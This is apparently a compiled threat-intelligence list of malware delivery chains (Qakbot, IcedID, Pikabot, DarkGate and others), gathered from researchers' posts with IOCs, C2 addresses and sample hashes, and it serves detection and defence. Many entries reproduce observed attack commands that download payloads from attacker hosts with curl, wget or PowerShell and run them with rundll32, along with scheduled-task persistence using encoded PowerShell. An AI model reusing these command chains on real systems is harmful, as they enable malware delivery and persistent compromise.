Top 50 Techniques & Procedures
url > .zip > .js > .dll
#Pikabot - #TA577 - url > .zip > .js > .dll
https://twitter.com/Cryptolaemus1/status/1709933199785418797
#Pikabot - #TA577 - url > .zip > .js > .dll
wscript PO_13670.js
cmd /c mkdir C:\ProgramData\LimdD\
WinHttp https://superrrdental.]com/H6F/dshjdsjkkd C:\ProgramData\LimdD\laminos.dll
rundll32.exe C:\ProgramData\LimdD\laminos.dll, HUF_inc_var
IOC's https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_05.10.2023.txt
url > .zip > .lnk > curl > .dll
#Pikabot- #TA577 - url > .zip > .lnk > curl > .dll
https://twitter.com/Cryptolaemus1/status/1709238615904018605
#Pikabot- #TA577 - url > .zip > .lnk > curl > .dll
cmd /c TZZ.pdf.lnk
curl http://207.246.78.]68/6kQh/T7t -o UL.log
rundll32 UL.dll, HUF_inc_var
c2's 167.86.96.]3:2222 38.242.240.]28:1194 167.86.81.]87:2222 79.141.175.]96:2078 209.126.9.]47:2078
IOC's https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_03.10.2023.txt
url > .zip > .lnk > curl > .vbs > curl > au3 > .exe
#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe
https://twitter.com/Cryptolaemus1/status/1708869147688419507
#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe
cmd /c MFGT.lnk
curl http://136.244.92.]148/rdFR2/GbB -o fjw.vbs
wscript fjw.vbs
cmd /c mkdir c:\rqdp
curl http://81.19.135.]17:2351 -o nvptjf.au3
Autoit3.exe nvptjf.au3
IOC's https://github.com/pr0xylife/DarkGate/blob/main/DarkGate_01.10.2023.txt
url > .zip > lnk > .vbs > .exe
#DarkGate - #TA577 - url > .zip > lnk > .vbs > .exe
https://twitter.com/Cryptolaemus1/status/1708869147688419507
#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe
cmd /c MFGT.lnk
curl http://136.244.92.]148/rdFR2/GbB -o fjw.vbs
wscript fjw.vbs
cmd /c mkdir c:\rqdp
curl http://81.19.135.]17:2351 -o nvptjf.au3
Autoit3.exe nvptjf.au3
IOC's https://github.com/pr0xylife/DarkGate/blob/main/DarkGate_01.10.2023.txt
url > .xll > curl > .dll
#IcedID - #TA577 - url > .xll > curl > .dll
https://twitter.com/Cryptolaemus1/status/1706635492224024765
#IcedID - #TA577 - url > .xll > curl > .dll
EXCEL.EXE Sr.xll
cmd /c curl -o c:\users\public\9y.dat http://135.125.177.]95/syK/3IldTx
rundll32 c:\users\public\9y.dat scab /k besogon728
Samples 👇
https://bazaar.abuse.ch/sample/310b9b7f54880f2142882e39637d73dfc8542eab06ac1bb9ec597b801979b4d8/
https://bazaar.abuse.ch/sample/f45d0303851f913cef47b612211d603449cedaab4df3484048c8473b9d71d96a/
IOC's https://github.com/pr0xylife/IcedID/blob/main/icedID_09.26.2023.txt
pdf > url > .js > ps > .dll
#Qakbot - BB32 - pdf > url > .js > ps > .dll
https://twitter.com/Cryptolaemus1/status/1669669651486240769
#Qakbot - BB32 - pdf > url > .js > ps > .dll
wscript Cx.js
powershell $res = "http://149.154.158.]191/znxlW/MGjrJji3RDB"; foreach ($Fo in $res) try {$Go = FromBase64($Fo)); iwr $Go -O C:\ProgramData\99.9.dll
rundll32 C:\ProgramData\99.9.dll,must
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB32_16.06.2023.txt
.pdf > .zip > curl > .dll
#Qakbot - obama268 - .pdf > .zip > curl > .dll
https://twitter.com/Cryptolaemus1/status/1669024540482052103
#Qakbot - obama268 - .pdf > .zip > curl > .dll
wscript CalculationOfCosts-1337.js
cmd.exe /c mkdir C:\Koltes\Fertiol & curl https://rapiska.]com/1337dat --output C:\Koltes\Fertiol\Floster.OCX
rundll32 C:\Koltes\Fertiol\Floster.OCX,must
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama268_14.06.2023.txt
url > .zip > .js > curl > .dll
#Qakbot - BB32 - url > .zip > .js > curl > .dll
https://twitter.com/Cryptolaemus1/status/1668965414867443712
#Qakbot - BB32 - url > .zip > .js > curl > .dll
wscript.exe docu_DF631_Jun_14_1.js
curl.exe -o c:\users\public\amounted.tmp http://192.121.17.]149/QmVep/DB278
conhost.exe rundll32.exe amounted.tmp,must
rundll32.exe amounted.tmp,must
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB32_14.06.2023.txt
.pdf > .zip > .js > .msi > .dll
#Qakbot - obama266 - .pdf > .zip > .js > .msi > .dll
https://twitter.com/Cryptolaemus1/status/1664300425829404673
#Qakbot - obama266 - .pdf > .zip > .js > .msi > .dll
wscript.exe ProjectFunding_1337_Jun01.js
msiexec.exe /V
rundll32.exe C:\Users\Admin\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama266_01.06.2023.txt
BB19 - .html > url > .js > .ps > .dll
#Pikabot - #Qakbot- BB19 - .html > url > .js > .ps > .dll
https://twitter.com/pr0xylife/status/1636402413912354816
#Pikabot - #Qakbot- BB19 - .html > url > .js > .ps > .dll
wscript.exe LL.js
$Mag = (https://hanika-inc.]com/mjnPR9/uo)
foreach ($washman in $Mag) {try {Invoke-WebRequest $washman -O $env:TEMP\Sulfuryl.dll
rundll32 $env:TEMP\Sulfuryl.dll,LS88
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB19_Pikabot_16.03.2023.txt
.pdf > .zip > .wsf > xmlhttp > .dll
#Qakbot - obama264 - .pdf > .zip > .wsf > xmlhttp > .dll
https://twitter.com/Cryptolaemus1/status/1661413082982170628
#Qakbot - obama264 - .pdf > .zip > .wsf > xmlhttp > .dll
wscript.exe Claim_C736.wsf
var u = "http://45.76.58.]72/a0UFMZnC6ltxphw.dat" http://http.open("GET", u[i], false)
conhost.exe rundll32.exe C:\Users\Public\amLE5PKlGAXrhpU.dat,bind
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama264_24.05.2023.txt
.one > .iso > .chm > ps > .dll
#Qakbot - BB24 - .one > .iso > .chm > ps > .dll
https://twitter.com/Cryptolaemus1/status/1648632165742137344
#Qakbot - BB24 - .one > .iso > .chm > ps > .dll
hh E:\README-JRN44.chm
powershell $sensillum = ("https://hotellosmirtos.]com/sjn/Tn0Q3nieE")
foreach ($form in $sensillum) {try {wget $form -O $env:TEMP\hexatetra
rundll32 $env:TEMP\hexatetra,Motd
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB24_19.04.2023.txt
.one > .img > .wsf > ps > .dll
#Qakbot - BB22 - .one > .img > .wsf > ps > .dll
https://twitter.com/Cryptolaemus1/status/1643614470164340736
#Qakbot - BB22 - .pdf > .zip > .wsf > ps > .dll
wscript AprilDetails.wsf
powershell $spear = ("https://kmphi.]com/FWovmB/8oZ0BOV5HqEX")
foreach ($banter in $spear) {try {wget $banter -O $env:TEMP\Lownesses
rundll32 $env:TEMP\Lownesses,X555
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB22_05.04.2023.txt
url > .js > ps > .dll
#Qakbot - BB33 - url > .js > ps > .dll
https://twitter.com/Cryptolaemus1/status/1671489179262369792
#Qakbot - BB33 - url > .js > ps > .dll
wscript Ix.js
powershell -encodedcommand $N = "http://151.236.14.]60/c1oHe/q9cRd2n0"
md C:\ProgramData\SNWSlycop
iwr $Brunt -O C:\ProgramData\SNWSlycop\joind.dll
rundll32 C:\ProgramData\SNWSlycop\joind.dll
IOC's https://github.com/pr0xylife/Qakb
Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL
Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL c2: ebothlips.com
https://twitter.com/k3dg3/status/1612860949773389835
Today's #IcedID "1421378695" dropped via PDFs with payloads hosted on firebasestorage.googleapis.com.*
Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL c2: ebothlips.com
https://bazaar.abuse.ch/sample/1796aef0940e800bcb2556782f92a7874422bbdfdda24e6658e43db4b0916850/
hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds)-> JS > payload via CURL > IcedID
hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds)-> JS > payload via CURL > IcedID
https://twitter.com/k3dg3/status/1697331227940798731
#IcedID "4240553492" rolling in
c2: oopscokir.com ProjectID: 4240553492
filename: inv_ug_08-31_[0-9]{3,5}.pdf Curl payload ex: hxxps://avestainfratech.com/out/t.php
tldr: hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds)-> JS > payload via CURL > IcedID
email > PDF > URL > Keitaro redirect > zip > pass > exe
email > PDF > URL > Keitaro redirect > zip > pass > exe
https://twitter.com/k3dg3/status/1683544196341219341
Incoming #IcedID "1561373935" filename: inv-details-jul23.pdf
Loader C2: filtaferamoza.com
email > PDF > URL > Keitaro redirect > zip > pass > exe
https://tria.ge/230724-w1dlaaha6w/behavioral1 https://bazaar.abuse.ch/sample/8b5529d29aeaf195889ebad68f2c3a390845e173edfec923acaf25fed824a529/
url > zip > lnk url > xll pdf > url > xll > msi
url > zip > lnk url > xll pdf > url > xll > msi
https://twitter.com/pr0xylife/status/1705331101365891455
#TA577 - Back on the scene pushing #Darkgate
Time to resume tracking operations, welcome back Tramp.
Distro 👇
url > zip > lnk url > xll pdf > url > xll > msi
Samples 👇
https://bazaar.abuse.ch/sample/026f4c95783ed33bc31c16a9a80842fa4a8efa4f67dff5a4739f90a8bc49a219/
https://bazaar.abuse.ch/sample/2eee7af95e457c97fb0bc3a91a00931c3c33e72f864e9bf4289565cba15ae484/
https://bazaar.abuse.ch/sample/bb2434f22b2fb7801cdd2b81e2b28a41a2beb2dc72b3d07ffec0e0f120c7a4bf/
https://bazaar.abuse.ch/sample/5bc060bd720757919db4f54f97e74b7110c67cf934423f86ffd483c7e2c367e2/
.zip > .doc > .dll
#Emotet- epoch4 - .zip > .doc > .dll
https://twitter.com/pr0xylife/status/1633096910008467459
#Emotet- epoch4 - .zip > .doc > .dll
WINWORD.EXE /n INVOICE 589 03_23.doc /o
https://midcoastsupplies.]com].au/configNQS/Es2oE4GEH7fbZ/?135704
regsvr32.exe C:\Windows\system32\MSBjdGgEfuEG\evPaAyJzdCSx.dll
IOC's https://github.com/pr0xylife/Emotet/blob/main/e4_emotet_07.03.2023.txt
.pdf > .url > .zip > .iso > .cmd > .exe
#IcedID - .pdf > .url > .zip > .iso > .cmd > .exe
https://twitter.com/pr0xylife/status/1616464950138109953
#IcedID - .pdf > .url > .zip > .iso > .lnk > .cmd > .dll
cmd.exe /c REF_Document.lnk
cmd.exe /c sacsimsapI.cmd
rundll32 standing.dat,init
c2'
http://umousteraton.]com
Samples here 👇
https://bazaar.abuse.ch/sample/3390b1d8560f565ed5e2a60df63ce24abe0ef3da514cf5645dd732f7e5cdbbae/
https://bazaar.abuse.ch/sample/ad174760985c5418b4a3c3a97cd8d7658e3bbb7030f72f2eff9ff97e57f200bd/
IOC's https://github.com/pr0xylife/IcedID/blob/main/icedID_20.01.2023.txt
url > .zip > .one > .hta > .curl > .dll
#Qakbot - BB12 - url > .zip > .one > .hta > .curl > .dll
https://twitter.com/pr0xylife/status/1620751340485120001
#Qakbot - BB12 - url > .zip > .one > .hta > .curl > .dll
mshta Open.hta
curl -o C:\ProgramData\index.png --url billmanagersystem.]com/ikA/d.gif
rundll32 C:\ProgramData\index.png,Wind
Samples 👇
https://bazaar.abuse.ch/sample/6c49b4d40b2925a4e5910e4157f7d302acf9203192187d3d1d178c258239f1c3/
https://bazaar.abuse.ch/sample/284f0fabbdfc1172cb1cbf74473321668c4b31789d93158669f6735bec124817/
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB12_01.02.2023.txt
.pdf > .zip > .js > .dll
#Qakbot - obama270 - .pdf > .zip > .js > .dll
https://twitter.com/Cryptolaemus1/status/1671528958192496640
#Qakbot - obama270 - .pdf > .zip > .js > .dll
wscript RrwuR.js
powershell -enc $bread = "https://viltare.]com/PlI6qXoN.dat"
md C:\ProgramData\SNWSPinna
iwr $Medio -O C:\ProgramData\SNWSPinna\Pinna.dll
rundll32 C:\ProgramData\SNWSPinna\Pinna.dll
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama270_21.06.2023.txt
url > .zip > .vhd > .lnk > .cmd > .cmd > .dll
#Qakbot - BB09 - url > .zip > .vhd > .lnk > .cmd > .cmd > .dll
https://twitter.com/pr0xylife/status/1599787375311212544
#Qakbot - BB09 - url > .zip > .vhd > .lnk > .cmd > .cmd > .dll
cmd /c HG.lnk
cmd.exe /q /c pests.cmd
cmd.exe /K dispersers.cmd system rundl
rundll32 erect.tmp,DrawThemeIcon
Samples 👇
https://bazaar.abuse.ch/sample/15c1feb12ecedafc233ebec6e0893ed0294f91ad48da9cc89c571ce3e316980d/
https://bazaar.abuse.ch/sample/c6887e515b36694e8e738c0df7610014e084bcce80ee13c998087471daf039a4/
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB09_05.12.2022.txt
url > .zip > .xlsb > .dll
#Qakbot - bb - url > .zip > .xlsb > .dll
https://twitter.com/pr0xylife/status/1577671455336194049
#Qakbot - bb - url > .zip > .xlsb > .dll
CreateDirectoryA C:\Hefagga
CreateDirectoryA C:\Hefaggad\Ukdfaovkga
http://metroberrylocalmarketing.]com/7z8b/0.html
regsvr32 /s calc
regsvr32 C:\Hefaggad\Ukdfaovkga\Buuefafa.dll
https://bazaar.abuse.ch/sample/d3788e69dd125449af3d985de93701c49cef0658bc98e3b449185f86cbee027d/
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_05.10.2022.txt
.html > .zip > .iso > .lnk > .png > .dll
#IcedID - .html > .zip > .iso > .lnk > .png > .dll
https://twitter.com/pr0xylife/status/1575903382505590784
#IcedID - .html > .zip > .iso > .lnk > .png > .dll
cmd.exe /c start ru^n^d^l^l3^2 2cdb83ee-c76c-4d7c-b9bc-2f4aab08f773.-Tf,PluginInit
rundll32 2cdb83ee-c76c-4d7c-b9bc-2f4aab08f773.-Tf,PluginInit
https://bazaar.abuse.ch/sample/0ab12d65800f3e7e6089fe3c534911f0b42d9175bcf955e937edd39e8bb2c13a/
c2 http://triskawilko.]com
IOC's https://github.com/pr0xylife/IcedID/blob/main/icedID_30.09.2022.txt
url > .zip > .lnk > curl > wscript > curl > .dll
#Qakbot - bb - url > .zip > .lnk > curl > wscript > curl > .dll
https://twitter.com/pr0xylife/status/1570064310923304962
#Qakbot - bb - url > .zip > .lnk > curl > wscript > curl > .dll
MD "C:\ProgramData\A_Np\fcA"
curl.exe -o %ProgramData%\A_Np\fcA\GCk.js ap2web.]com/MwS/13.html
wscript.exe GCk.js
paritoys.]com/9nD/130.html
regsvr32 REPORT_9MyMg_.SRm.IH.dll
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_14.09.2022.txt
.zip > .docm > .curl > .dll
#IcedID - .zip > .docm > .curl > .dll
https://twitter.com/pr0xylife/status/1565354363765215238
#IcedID - .zip > .docm > .curl > .dll
cmd /c curl http://193.178.210.]58/-o c:\ProgramData\MH4SG6MYDDyi.dll && rundll32 c:\ProgramData\MH4SG6MYDDyi.dll,#1
https://bazaar.abuse.ch/sample/133245a337b1703f3940d8ca3907c9bb7ec6b47701257766e70d7c9318571ce5/
c2 http://donorcabr.]com/
IOC's https://github.com/pr0xylife/IcedID/blob/main/icedID_01.09.2022.txt
EML>.tar.gz>.exe
EML>.tar.gz>.exe
https://twitter.com/Tac_Mangusta/status/1709107786078982211
EML>zip pw>.url>SMB>zip>vbs>certutil
EML>zip pw>.url>SMB>zip>vbs>certutil>#Ursnif
https://twitter.com/JAMESWT_MHT/status/1706919214588506202
pec > .zip > .url > .exe (smb)
pec > .zip > .url > .exe (smb)
https://twitter.com/Tac_Mangusta/status/1703716708236570650
Mail(stolen old conv) > .zip > .js > .7z (psw) > .dll(key)
Mail(stolen old conv) > .zip > .js > .7z (psw) > .dll(key)
https://twitter.com/Tac_Mangusta/status/1702247512529060244
USB > .lnk > .ps1 > .exe
USB > .lnk > .ps1 > .exe
https://twitter.com/Tac_Mangusta/status/1678185981344731137
LZH > EXE
LZH > EXE
https://twitter.com/reecdeep/status/1696539420219056590
Phish -> .rar -> .cmd -> .ps1 -> AutoIT -> force shutdown -> autorun persistence leading to execution of Metamorfo DLL's
Phish -> .rar -> .cmd -> .ps1 -> AutoIT -> force shutdown -> autorun persistence leading to execution of #Metamorfo DLL's
https://twitter.com/0xToxin/status/1694756006889206044
Bumblebee
#Bumblebee Infection Flow TTPs🐝 [+] Mark-of-the-Web Bypass: IMG (T1553.005) [+] Malicious File: LNK (T1204.002) [+] Windows Command Shell: BAT (T1059.003) [+] Rename System Utilities: copy & rename (T1036.003) [+] Scheduled Task: schtasks.exe (T1053.005) [+] Rundll32(T1218.011)
https://twitter.com/Max_Mal_/status/1600847676270006272
HTML to PluginInit
[+] HTML Smuggling (T1027.006) [+] Msiexec - .msi stager (T1218.007) [+] Rundll32 - .dll loader (T1218.011) [+] New export func: init, a short version of PluginInit🔥
#DFIR exec flow: msi > [RPC Install] > msiexec > rundll32
https://twitter.com/Max_Mal_/status/1600433854937866240
EML>Pdf>Url>js>url>js>url>PEDLL
EML>Pdf>Url>js>url>js>url>PEDLL>
https://twitter.com/JAMESWT_MHT/status/1678982791705378816
Onenote sample > Bat > curl url > Dll
Onenote sample > Bat > curl url > Dll
https://twitter.com/JAMESWT_MHT/status/1641782661503918081
bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf
bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf
https://twitter.com/JAMESWT_MHT/status/1658785799394000898
Qakbot js
Qakbot - JS -> DLL -> Sacrificial Process WmiPrvSE conhost =› conhost. exe conhost. exe conhost. exe rund1132. exe C: \Users \alice\noises.dat, next conhost =› conhost. exe conhost. exe rundll32. exe C: \Users\alice\noises.dat, next conhost => conhost. exe rund1132. exe C: \Users \alice \noises. dat, next rund1132 => rund1132.exe C: \Users \alice \noises.dat, next rund1132 => rundl132.exe C: \Users \alice\noises.dat, next explorer C: \Windows \SysW0W64 \explorer. exe
https://twitter.com/ACEResponder
Pikabot
#Pikabot execution chain: ➡️ rundll32.exe <PikaBot_payload>.dll,Test (initial execution) ➡️ WerFault.exe (connects to PikaBot C2, in our case it's 45.85.235[.]39) ➡️ whoami.exe /all ➡️ ipconfig.exe /all ➡️ schtasks.exe /Create /F /TN "{B220CD07-2339-4E8E-8FDD-DF2C6D1B42DC}" /TR "cmd /q /c start /min "" powershell "$HydrofluoboricInclaspedNonredressing = Get-ItemProperty -Path HKCU:\Software\HydrofluoboricInclaspedNonredressing; powershell -encodedcommand $HydrofluoboricInclaspedNonredressing.ParodyRoisterImpressibly"" /SC HOURLY /MO (example of the scheduled task as a persistence mechanism, the registry values and task name can change) NOTE: whoami, ipconfig, schtasks were spawned from WerFault.exe ➡️ PowerShell execution: powershell "$HydrofluoboricInclaspedNonredressing = Get-ItemProperty -Path HKCU:\Software\HydrofluoboricInclaspedNonredressing; powershell -encodedcommand $HydrofluoboricInclaspedNonredressing.ParodyRoisterImpressibly" ➡️ PowerShell execution (child process): "powershell.exe" -encodedcommand [REDACTED] -> decoded output is provided in the screenshot ➡️ curl.exe --url hxxps://192.9.135[.]73:1194/neurophysiologist/D3CAP09duSVlX?TransitorilyVerbosities=y4EB3Rb -A upb4geF6poodkVW2YaySEzk4C32sCDV -X POST --insecure (sends the POST request out to one of the IPs in the decoded output) ➡️ powershell.exe start rundll32 $env:APPDATA\Microsoft\HydrofluoboricInclaspedNonredressing\ParodyRoisterImpressibly.dll, Test (starts the PikaBot payload) ➡️ The POST request sent to C2: {"ParodyRoisterImpressibly":"CgBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwASAB5AGQAcgBvAGYAbAB1AG8AYgBvAHIAaQBjAEkAbgBjAGwAYQBzAHAAZQBkAE4AbwBuAHIAZQBkAHIAZQBzAHMAaQBuAGcAXABQAGEAcgBvAGQAeQBSAG8AaQBzAHQAZQByAEkAbQBwAHIAZQBzAHMAaQBiAGwAeQAuAGQAbABsACwAIABUAGUAcwB0AAoA","success":"true"} (Base64-encoded string contains the command to execute the PikaBot DLL payload on the host)
https://twitter.com/AnFam17
#Qakbot DLL Side-Loading TTPs DFIR exec flow: ZIP > EXE&DLL > curl > rundll32
#Qakbot DLL Side-Loading #TTPs#DFIR exec flow: ZIP > EXE&DLL > curl > rundll32 https://twitter.com/Max_Mal_
Redirect Services
⚠️ Legitimate Services Abused For Phishing Purposes
1- Bing Redirect - https://app.any.run/tasks/9a1e55eb-05c5-499b-b995-d5ef0e275394?utm_source=twitter&utm_medium=post&utm_campaign=task1&utm_content=linktotask&utm_term=031023/
2- Google AMP - https://app.any.run/tasks/544a7608-87b2-4e37-9804-556151684be5?utm_source=twitter&utm_medium=post&utm_campaign=task2&utm_content=linktotask&utm_term=031023/
3- Microsoft Customer Voice - https://app.any.run/tasks/e239ecc0-74cf-45ed-9f15-f4a9b35fe65e?utm_source=twitter&utm_medium=post&utm_campaign=task3&utm_content=linktotask&utm_term=031023/
4- Cloudflare R2 Dev Bucket - https://app.any.run/tasks/41d192ee-95d9-4aed-a8eb-7b1819f5865c?utm_source=twitter&utm_medium=post&utm_campaign=task4&utm_content=linktotask&utm_term=031023/
https://twitter.com/anyrun_app/status/1709193919118844267
VBS -> PowerShell -> Stego Hidden Payload -> Downloader DLL -> LimeRAT
VBS -> PowerShell -> Stego Hidden Payload -> Downloader DLL -> LimeRAT
https://twitter.com/dark0pcodes